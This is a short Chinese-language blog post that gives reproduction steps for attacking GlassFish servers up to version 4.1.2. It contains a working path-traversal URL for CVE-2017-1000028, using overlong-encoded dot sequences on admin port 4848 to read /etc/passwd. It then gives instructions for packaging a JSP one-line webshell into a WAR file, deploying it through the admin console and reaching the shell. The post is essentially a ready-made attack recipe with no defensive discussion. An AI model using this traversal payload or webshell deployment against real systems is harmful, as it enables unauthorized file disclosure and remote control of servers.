GlassFish

1.漏洞复现

CVE-2017-1000028 目录穿越/任意文件读取漏洞

影响范围:GlassFish <=4.1.2

4848是管理端口,%c0%ae解析为.

访问https://IP:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

后台GetShell

将JSP一句话木马制作为war包

jar cvf shell.war shell.jsp

登录后台,路径:https://IP:4848/

Applications->deploy->上传war包

木马路径:/shell/shell.jsp(根据自己的文件名改)

posted @ 2023-01-13 03:29  Hacker&Cat  阅读(126)  评论(0编辑  收藏  举报